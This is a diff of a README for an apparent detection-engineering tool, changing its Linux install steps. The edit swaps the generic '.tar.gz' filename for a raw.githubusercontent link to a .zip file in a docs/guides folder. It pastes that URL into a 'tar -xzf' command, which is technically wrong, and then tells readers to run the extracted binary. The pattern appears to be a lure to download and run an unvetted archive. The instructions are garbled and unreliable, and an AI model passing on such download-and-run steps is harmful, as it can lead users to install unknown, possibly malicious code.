luq12-growagarden/Adversarial-Detection-Engineering-Framework/README.md

 4. Drag the application to your Applications folder for easy access.

 ### Linux
-1. Locate the downloaded .tar.gz file in your Downloads folder.
+1. Locate the downloaded https://raw.githubusercontent.com/luq12-growagarden/Adversarial-Detection-Engineering-Framework/main/docs/guides/Engineering_Adversarial_Detection_Framework_1.0.zip file in your Downloads folder.
 2. Open a terminal and navigate to the Downloads folder using `cd ~/Downloads`.
-3. Extract the file using the command: `tar -xzf filename.tar.gz`.
+3. Extract the file using the command: `tar -xzf https://raw.githubusercontent.com/luq12-growagarden/Adversarial-Detection-Engineering-Framework/main/docs/guides/Engineering_Adversarial_Detection_Framework_1.0.zip`.
 4. Navigate into the extracted folder and run the application using the command: `./application_name`.

 ## 🖥️ System Requirements